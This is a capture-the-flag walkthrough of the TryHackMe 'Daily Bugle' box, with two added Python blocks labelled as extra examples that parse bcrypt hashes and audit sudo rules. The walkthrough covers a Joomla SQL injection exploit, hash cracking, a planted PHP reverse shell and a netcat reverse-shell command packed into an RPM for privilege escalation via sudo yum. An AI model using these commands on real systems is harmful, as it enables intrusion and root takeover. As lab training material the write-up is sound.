TryHackMe Daily Bugle

Today we are going to tackle the Daily Bugle on TryHackMe. I would say this is a pretty good beginner box. I got stuck for a while at the part where we put in our PHP code, because I didn't know just hitting preview would give me a shell! All part of the learning process.

Let's start off by using our favorite port scanner, Nmap. I had to use the -Pn option to assume the host was up, because the host was blocking the initial ping probe. Nmap will assume that a host is down if it doesn't get an answer to a ping, and skip it.

nmap -p- -T4 --reason -Pn IPAddress

Now that we know ports 22, 80 and 3306 are open, let's do a service enumeration scan against them using Nmap.

nmap -p22,80,3306 -sV -T4 --reason IPAddress

When we visit the web server it tells us who robbed the bank, answering our first question.

Now we need to know what version of Joomla! is running. Certain files on the website may disclose version information. First, right click on the page and select Inspect Element.

Now we can google how to enumerate the version of Joomla!. If you can find a language manifest file it may contain the version information. We can also visit the README.txt file to try to enumerate the version. In this case both worked!

http://IPAddress/language/en-GB/en-GB.xml

http://IPAddress/README.txt

Looks like we are running version 3.7. The answer wants the minor version as well, so we can guess that it's 0, making the answer 3.7.0.

Let's search for exploits for Joomla! 3.7.0 on Google. I found a python exploit, so I will use that instead of Metasploit. The reason I don't use Metasploit is to practice manually exploiting vulnerabilities. That way when I take my OSCP things are easier.

https://github.com/stefanlucas/Exploit-Joomla/blob/master/joomblah.py

Looking at the python code, it first obtains a CSRF token by visiting /index.php/component/users/?view=login. It then performs SQL injection to pull out a user's password hash. Let's try the exploit and see what happens.

I saved the exploit code as JoomlaExploit.py, so to exploit it we will run

python JoomlaExploit.py http://IPAddress/

Honestly I am not sure how to determine which version of python to use, so I tried version 2 and 3. Turns out version 2 worked for the exploit. Great, we have a super user with a hash! Now we just need to crack the hash to determine the password!

There's a great tool built into Kali called hashid. It's a python script, and if you give it either -m (hashcat) or -j (John the Ripper) it will tell you the hash type and the mode or format to use to crack it! We can also combine the options to get both.

hashid -j -m '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm'
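To see what hashid is actually reporting, here is an added example (not from the walkthrough or the hashid project) that splits a bcrypt string into its modular-crypt fields, attaches the hashcat mode and John format for bcrypt, and flags a cost factor below a policy minimum. The walkthrough's hash is used as input; the second and third sample lines and the minimum cost of 10 are constructed assumptions.

```python
import re

# Modular-crypt-format layout of a bcrypt string (60 characters total):
#   $<ident>$<cost>$<22-char salt><31-char digest>
# ident is 2a, 2b, 2x or 2y; cost is the log2 work factor.
BCRYPT_RE = re.compile(
    r"^\$(2[abxy])\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$"
)

# Cracker settings for bcrypt, the values hashid reports with -m and -j.
HASHCAT_MODE = 3200      # hashcat: bcrypt $2*$, Blowfish (Unix)
JOHN_FORMAT = "bcrypt"   # john: --format=bcrypt

# Minimum acceptable cost; 10 is an assumed policy value, not something from the page.
MIN_COST = 10


def parse_bcrypt(hash_str: str) -> dict:
    """Split a bcrypt string into its fields and attach cracker parameters.

    Raises ValueError if the string is not a well-formed bcrypt hash.
    """
    m = BCRYPT_RE.match(hash_str)
    if not m:
        raise ValueError("not a bcrypt modular-crypt string")
    ident, cost, salt, digest = m.groups()
    cost = int(cost)
    return {
        "variant": ident,          # "2y" is the variant PHP's password_hash() emits
        "cost": cost,
        "iterations": 2 ** cost,   # key-setup rounds the cost factor expands to
        "salt": salt,
        "digest": digest,
        "hashcat_mode": HASHCAT_MODE,
        "john_format": JOHN_FORMAT,
        "weak_cost": cost < MIN_COST,
    }


def audit_hashes(lines):
    """Classify each line as bcrypt (with fields) or unknown, e.g. when reviewing a dumped users table."""
    report = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            report.append(parse_bcrypt(line))
        except ValueError:
            report.append({"raw": line, "variant": None})
    return report


# The bcrypt string from the walkthrough, a constructed low-cost bcrypt string,
# and a constructed non-bcrypt line to show the unknown path.
SAMPLE_HASHES = [
    "$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm",
    "$2a$04$abcdefghijklmnopqrstuuABCDEFGHIJKLMNOPQRSTUVWXYZ01234",  # constructed, cost 4
    "5f4dcc3b5aa765d61d8327deb882cf99",                                # constructed, not bcrypt
]

if __name__ == "__main__":
    for entry in audit_hashes(SAMPLE_HASHES):
        if entry["variant"] is None:
            print(f"unknown: {entry['raw']}")
        else:
            flag = " (cost below policy)" if entry["weak_cost"] else ""
            print(f"bcrypt {entry['variant']} cost={entry['cost']} "
                  f"hashcat -m {entry['hashcat_mode']} john --format={entry['john_format']}{flag}")
```

The cost field is the part worth reading as a defender: every increment doubles the work per guess, so a cost of 10 means 1024 key-setup rounds per candidate, which is why the cracking step later in this post takes minutes rather than seconds.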

Now we can attempt to crack the password!

First, let's put this hash into a file. Use single quotes so the shell does not try to expand the $ characters.

echo '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm' > hash

If we want to use John the Ripper with default values, run: john hash

If we want to use hashcat, run

hashcat -a 0 -m 3200 hash /usr/share/wordlists/rockyou.txt

I actually moved this onto my Windows machine to make it run faster. I have the rockyou.txt file in the same directory as hashcat. After about 5 minutes on my Windows laptop I cracked the password.

hashcat.exe -a 0 -m 3200 hash rockyou.txt

Now we can log in to Joomla! as jonah.

Visit http://10.10.151.66/administrator

User: jonah

pass: spiderman123

Go to the drop down menu Extensions > Templates > click on Templates.

Click on Beez3 Details and Files.

Now click on the index.php file and it will show you all the code for that PHP file.

Now paste a PHP reverse shell at the bottom of the file. Be sure to replace $ip and $port with the address and port of the netcat listener you will set up next. Then click on Save.

Let's set up the netcat listener by running: nc -nlvp 1337

Finally you click on Template Preview and check your netcat for a shell!

Run whoami and you will see you are the www-data user. This means we need to escalate privileges. Since we don't know the password for this account, we won't be able to run sudo -l to check for sudo commands we can run.

We still need to find the user flag, which www-data doesn't have access to. Looking through the directories, there is a configuration file in /var/www/html.

cat /var/www/html/configuration.php

Looks like we now have credentials for the database, so let's try to log in using them. First we need to upgrade our shell. Run which python and we see we have /usr/bin/python. Now create a tty shell by running

python -c 'import pty; pty.spawn("/bin/sh")'

We now have a proper shell and can interact with MySQL.

mysql -u root -p

Now enter the password we found under public $password in configuration.php.

Now that we have a prompt, let's select the database named joomla, which we saw above under public $db.

use joomla;

Now that we are using the database, run

show tables;

This lists all the tables. When we find an interesting one we can view its contents.

The fb9j5_users table could be interesting, so let's query its data.

select * from fb9j5_users;

This dumps out all the rows and gives us a hash, but it is the same hash we grabbed earlier with the SQL injection exploit.

We could have skipped the whole section above interacting with the database, but it never hurts to try something!

If we look in /home we see a user named jjameson. Maybe the database password has been reused for this user.

ssh jjameson@IP

nv5uz9r3ZEDzVjNu

We are in as the user! The database password was reused for the jjameson account.

cat user.txt

Submit the flag.

Now we can try for a quick win by seeing if we can run any binaries as root.

sudo -l

Great, we can run yum as root without a password! Let's check https://gtfobins.github.io for privilege escalation. This site shows you many ways to escalate your privileges, among other things like downloading files and breaking out of restricted shells, based on different Linux binaries.

https://gtfobins.github.io/gtfobins/yum/

We can use method A, but we need the fpm package installed on our Linux environment (the attacker machine).

apt-get install ruby ruby-dev rubygems build-essential rpm -y

sudo gem install --no-document fpm

Once those are installed we can create our package for privilege escalation.

TF=$(mktemp -d)

echo '/usr/bin/nc -e "/bin/sh" IP PORT' > $TF/x.sh

fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF

Now spin up a quick python server so we can download the file.

python3 -m http.server 1111

or

python2 -m SimpleHTTPServer 1111

Either one should work fine, I am using python3 for mine.

On the target machine, move into the temp directory and download the file. We want to move into /tmp because we should be able to write there. Since we are the user, we could also write anywhere in /home/jjameson.

cd /tmp

wget http://IPAddress:1111/x-1.0-1.noarch.rpm

Now we need to install this package using yum, which will escalate our privileges.

NOTE: If your package doesn't work the first time (mine didn't, because I tried a different command), you can remove it using sudo yum remove x-1.0-1.noarch

First let’s start a reverse listener on our attacker machine.

nc -nlvp 7777

Now on the target run

sudo /usr/bin/yum localinstall -y x-1.0-1.noarch.rpm

NOTE: If you don't get your shell, you can try removing the package and reinstalling it.

To remove the package run

sudo yum remove x-1.0-1.noarch

It will appear to hang at "Running transaction", but if you check your listener you have a shell as root! We can quickly upgrade this to a better shell using python.
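The reason this works is the sudo rule found earlier: yum runs as root with NOPASSWD, and a package manager executes package scripts as part of its normal job. As an added example (not from the walkthrough or GTFOBins), here is the check a defender would run against `sudo -l` output or a sudoers export: parse each privilege line and flag unrestricted commands, binaries known to offer a shell escape, and rules that need no password. The sample output is constructed to match the rule described in this post; the host name "target" and the second rule are assumptions, and the escape-binary set lists only yum, the binary this post uses.

```python
import re

# Binaries that GTFOBins documents as giving a root shell when runnable via sudo.
# Only yum (the binary from this walkthrough) is listed; an assumed real audit would
# populate this set from https://gtfobins.github.io/.
SHELL_ESCAPE_BINARIES = {"yum"}

# One privilege line as printed by `sudo -l`:
#   (runas) TAG: TAG: /path/cmd args, /path/cmd2
PRIV_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$"
)


def parse_sudo_privileges(output: str):
    """Turn the privilege lines of `sudo -l` output into dicts of runas/tags/command."""
    entries = []
    for line in output.splitlines():
        m = PRIV_RE.match(line)
        if not m:
            continue  # skips the "Matching Defaults" and "may run" header lines
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                entries.append({"runas": m.group("runas").strip(),
                                "tags": tags, "command": cmd})
    return entries


def audit_sudo_privileges(output: str):
    """Flag entries worth reviewing: ALL, shell-escape binaries, and NOPASSWD rules."""
    findings = []
    for e in parse_sudo_privileges(output):
        binary = e["command"].split()[0].rsplit("/", 1)[-1]
        reasons = []
        if e["command"] == "ALL":
            reasons.append("unrestricted command")
        if binary in SHELL_ESCAPE_BINARIES:
            reasons.append(f"{binary} is a known shell-escape binary")
        if "NOPASSWD" in e["tags"]:
            reasons.append("no password required")
        if reasons:
            findings.append({**e, "reasons": reasons})
    return findings


# Constructed `sudo -l` output shaped like the jjameson result in this post,
# plus an assumed benign rule that should not be flagged.
SAMPLE_SUDO_L = """\
Matching Defaults entries for jjameson on target:
    !visiblepw, always_set_home, env_reset

User jjameson may run the following commands on target:
    (ALL) NOPASSWD: /usr/bin/yum
    (root) /usr/bin/systemctl restart httpd
"""

if __name__ == "__main__":
    for f in audit_sudo_privileges(SAMPLE_SUDO_L):
        print(f"{f['runas']:>6}  {f['command']:<40} {'; '.join(f['reasons'])}")
```

The fix on the defending side is the same thing the audit points at: a package manager should not be in a sudo rule at all, and if a maintenance task genuinely needs it, the rule should name a wrapper script with fixed arguments and keep the password requirement.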

python -c 'import pty; pty.spawn("/bin/bash")'

Thanks for joining me for another journey through hacking!  Hope you learned something.